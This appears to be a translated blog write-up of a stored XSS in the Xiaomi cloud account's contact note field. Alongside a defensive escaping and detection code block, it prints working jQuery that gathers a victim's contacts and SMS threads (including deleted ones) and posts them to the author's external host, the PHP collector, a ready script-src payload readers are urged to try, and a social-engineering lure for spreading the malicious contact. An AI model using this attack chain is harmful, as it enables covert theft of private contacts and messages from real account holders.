Isn't "shake the phone to share a contact" one of the most popular features? That is where this story starts.
Scenario hypothesis:
A: Hey, man, are you using a Xiaomi phone too?
B: Of course, a Xiaomi phone!
A: I recently got the number of some leading figure! For a friend's sake I'll share it... but you have to log on to i.xiaomi.com and sync to the computer to see the number.
B: Okay! Okay!
As a result, B logs on to i.xiaomi.com and sees nothing. Meanwhile, at the other end, A collects B's Xiaomi account name on his computer, along with B's phone contacts and SMS!
Getting to the point: log on to the Xiaomi account. The contact details are displayed on the right,
and it can be seen that the phone number and email fields are not filtered for format.
To be safe, pick a field that accepts a lot of characters: the note field!
<iframe src="http://www.baidu.com"></iframe>
<script>alert(/xss by cp0204/);</script>  the write succeeds!
Who says XSS is of little value? It depends on how you use it. I tried to capture packets, but the Xiaomi account site is HTTPS and capturing packets is very difficult, so I will analyze it with the browser instead.
Continue
All of the requests have been captured, corresponding to the three columns respectively. Now we need a way to collect the data.
It looks like this: 37009121 is my Xiaomi ID, and I don't know what the remaining parameters do, useful or not, but the data can be obtained through JS.
https://i.xiaomi.com/contacts/37009121/full?_dc=1342331522472&syncTag=0&limit=500 returns:
{"result": "ok", "description": "successful", "data": {"content": {"9204442": {"content": {"id": 9204442, "status": "custom", "tag": 10327278, "organizations": [{"title": "lead", "company": "related departments"}], "emails": [{"value": "Cp0204@qq.com", "type": "home"}], "phoneNumbers": [{"value": "123456", "type": "mobile"}], "displayName": "related departments", "note": "<iframe src=\"http://www.baidu.com\"><\/iframe>\n<script>alert(/xss by cp0204/);<\/script>"}, "spinyin": "ygbm", "type": "contact", "pinyin": "youguanbumen"}}, "lastPage": true, "letterIndex": {"Y": [9204442]}, "group": [], "syncTag": 10327278}, "code": 0}
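The root cause above is that the note (and the other contact fields) are stored and rendered without output encoding. As an added example, not code from this post or from Xiaomi, here is how the web client should encode every field of that sync record before putting it into the page, plus an audit pass that flags stored records whose text fields already contain markup; the sample record is constructed to mirror the response shape shown above, with placeholder ids and values.

```javascript
// Added example, not Xiaomi's code: HTML-encode contact fields before they are
// inserted into the page, and flag stored records whose text fields carry markup.
// SAMPLE is constructed to mirror the /contacts/<id>/full response shape above;
// ids and values are placeholders.
const SAMPLE = { data: { content: { "9204442": { content: {
  id: 9204442, displayName: "related departments",
  emails: [{ value: "someone@example.com", type: "home" }],
  phoneNumbers: [{ value: "123456", type: "mobile" }],
  note: '<iframe src="http://www.baidu.com"></iframe>\n<script>alert(1)</script>',
} } } } };

// Entity-encode the five characters that matter inside element bodies and
// double-quoted attribute values.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Safe rendering: every field goes through escapeHtml, so the note above is
// shown as literal text instead of being executed by the browser.
function renderContact(c) {
  const phones = c.phoneNumbers.map((p) => escapeHtml(p.value)).join(", ");
  const emails = c.emails.map((e) => escapeHtml(e.value)).join(", ");
  return `<div class="contact" data-id="${escapeHtml(c.id)}">` +
    `<h3>${escapeHtml(c.displayName)}</h3><p>${phones}</p><p>${emails}</p>` +
    `<pre>${escapeHtml(c.note)}</pre></div>`;
}

// Detection: walk a sync response and list the fields that contain tag-like
// markup, for a write-time validation hook or an audit over stored records.
function findMarkupFields(sync) {
  const tagLike = /<\s*\/?[a-z][^>]*>/i;
  const hits = [];
  for (const [key, entry] of Object.entries(sync.data.content)) {
    const c = entry.content;
    const fields = [["displayName", c.displayName], ["note", c.note]]
      .concat((c.emails || []).map((e, i) => [`emails[${i}]`, e.value]))
      .concat((c.phoneNumbers || []).map((p, i) => [`phoneNumbers[${i}]`, p.value]));
    for (const [name, value] of fields) {
      if (tagLike.test(String(value ?? ""))) hits.push(`${key}.${name}`);
    }
  }
  return hits;
}
```

Encoding on output is what stops the stored note from running; the audit only tells you which existing records would have executed before the fix was deployed.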
jQuery is already included on the site, which makes it much easier for me to write JS to fetch the data.
// Fetch the contacts
result1 = getdata("/contacts/" + mid + "/full?syncTag=0");
// Fetch the text messages
result2 = getdata("/sms/" + mid + "/full/thread?syncTag=0&limit=20&_dc=1342338505981&readMode=older"); // all
result3 = getdata("/sms/" + mid + "/locked?syncTag=0&limit=20&_dc=1342338505981&readMode=older"); // favourites
result4 = getdata("/sms/" + mid + "/deleted/thread?syncTag=0&limit=20&_dc=1342338505981&readMode=older"); // deleted
function getdata(url) {
    var data;
    $.ajax({
        url: url,
        async: false, // synchronous so that data is filled before we return
        success: function (result) { data = obj2str(result); } // obj2str: the author's serialisation helper, not shown in the post
    });
    return data;
}
... Then send it off for collection:
$.post("http://cptimer.sinaapp.com/mi/mi.php?mid=" + mid + "&data=" + data, {mid: mid, data: data}, function (result) {
    alert(result); // returns mid and data
});
By the way, jQuery AJAX cannot make cross-origin requests; the request is still sent, but no response comes back, so a POST is acceptable here. mi.php:
<?
$mid = $_REQUEST['mid'];
$data = $_REQUEST['data'];
echo "Xiaomi ID:" . $_REQUEST["mid"] . "\n account data:" . $_REQUEST["data"];
?>
In this way, all contacts and text messages are collected.
Curious? Add the following to the note field and test it yourself, for learning purposes...
<script src="http://cptimer.sinaapp.com/mi/mi.js"></script>
============================ Final summary ==============================
When I learned this, the experts just smiled. A small XSS is still a big problem. Many people look down on XSS; maybe those people can only pop up an alert box.
There is also the social-engineering side: how to get the contact passed on to others.
In addition, if you have a Xiaomi phone, you can test whether the text-message box can be attacked. If it can, it gets even easier: send an XSS text message and get the target to read it from their Xiaomi account... That is another idea, but it cannot be tested without a Xiaomi phone.
Stealing these things is still very valuable. Imagine all your contacts and text messages being leaked...
Important people, such as... the relevant department leaders.
Solution: you know better than I do.